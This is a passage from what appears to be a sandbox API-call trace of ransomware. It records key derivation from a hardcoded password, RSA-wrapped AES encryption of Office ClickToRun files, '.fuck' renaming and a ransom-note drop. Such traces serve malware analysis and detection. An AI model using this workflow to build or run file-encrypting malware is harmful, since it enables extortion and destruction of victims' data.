(lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0234.530] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0234.530] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.531] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.531] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.531] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2792880) returned 1 [0234.539] CryptCreateHash (in: hProv=0x2792880, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.539] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.539] CryptHashData (hHash=0x27172a8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.539] CryptDeriveKey (in: hProv=0x2792880, Algid=0x6610, hBaseData=0x27172a8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27176a8) returned 1 [0234.539] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.539] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.539] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2792cc0) returned 1 [0234.541] CryptImportPublicKeyInfo (in: hCryptProv=0x2792cc0, dwCertEncodingType=0x1, pInfo=0x2796618*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796648*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796650*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2717668) returned 1 [0234.542] CryptEncrypt (in: hKey=0x2717668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.542] CryptEncrypt (in: hKey=0x2717668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792b28*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792b28*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.542] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792b28, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.542] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.542] CryptEncrypt (in: hKey=0x27176a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.542] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.542] CloseHandle (hObject=0xffffffff) returned 1 [0234.542] CloseHandle (hObject=0xffffffff) returned 1 [0234.542] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0234.542] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0234.543] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0234.543] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0234.543] CryptDestroyHash (hHash=0x27172a8) returned 1 [0234.543] CryptDestroyKey (hKey=0x27176a8) returned 1 [0234.543] CryptReleaseContext (hProv=0x2792880, dwFlags=0x0) returned 1 [0234.543] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.543] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.544] GetLastError () returned 0x5 [0234.544] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash")) returned 0x20 [0234.544] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0234.544] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.544] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.545] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0234.545] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x27935c8) returned 1 [0234.554] CryptCreateHash (in: hProv=0x27935c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.554] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.554] CryptHashData (hHash=0x2717728, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.554] CryptDeriveKey (in: hProv=0x27935c8, Algid=0x6610, hBaseData=0x2717728, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27176a8) returned 1 [0234.554] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.554] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.554] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2793078) returned 1 [0234.557] CryptImportPublicKeyInfo (in: hCryptProv=0x2793078, dwCertEncodingType=0x1, pInfo=0x27962d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796308*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796310*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27172a8) returned 1 [0234.558] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.558] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792c38*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792c38*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.558] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792c38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.558] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.558] CryptEncrypt (in: hKey=0x27176a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.558] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.558] CloseHandle (hObject=0xffffffff) returned 1 [0234.558] CloseHandle (hObject=0xffffffff) returned 1 [0234.558] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0234.559] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0234.559] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.gsg")) returned 0 [0234.559] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\s641033.hash.fuck")) returned 0 [0234.560] CryptDestroyHash (hHash=0x2717728) returned 1 [0234.560] CryptDestroyKey (hKey=0x27176a8) returned 1 [0234.560] CryptReleaseContext (hProv=0x27935c8, dwFlags=0x0) returned 1 [0234.560] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.560] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.560] GetLastError () returned 0x5 [0234.560] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0234.560] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0234.561] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.561] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.561] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0234.561] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x27935c8) returned 1 [0234.571] CryptCreateHash (in: hProv=0x27935c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.571] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.571] CryptHashData (hHash=0x2717328, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.571] CryptDeriveKey (in: hProv=0x27935c8, Algid=0x6610, hBaseData=0x2717328, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27170a8) returned 1 [0234.571] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.571] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.571] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2792880) returned 1 [0234.574] CryptImportPublicKeyInfo (in: hCryptProv=0x2792880, dwCertEncodingType=0x1, pInfo=0x2797658*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797688*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797690*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2717728) returned 1 [0234.574] CryptEncrypt (in: hKey=0x2717728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.574] CryptEncrypt (in: hKey=0x2717728, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792d48*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792d48*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.574] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792d48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.575] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.575] CryptEncrypt (in: hKey=0x27170a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.575] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.575] CloseHandle (hObject=0xffffffff) returned 1 [0234.575] CloseHandle (hObject=0xffffffff) returned 1 [0234.575] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0234.575] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0234.576] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0234.576] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0234.576] CryptDestroyHash (hHash=0x2717328) returned 1 [0234.576] CryptDestroyKey (hKey=0x27170a8) returned 1 [0234.576] CryptReleaseContext (hProv=0x27935c8, dwFlags=0x0) returned 1 [0234.576] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0234.576] FindClose (in: hFindFile=0x27173a8 | out: hFindFile=0x27173a8) returned 1 [0234.576] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0234.577] AreFileApisANSI () returned 1 [0234.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0234.577] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.577] GetLastError () returned 0x5 [0234.577] GetLastError () returned 0x5 [0234.577] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.577] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27174a8 [0234.588] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.588] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.589] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.589] GetLastError () returned 0x5 [0234.589] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0234.589] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0234.591] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.591] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.591] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg", 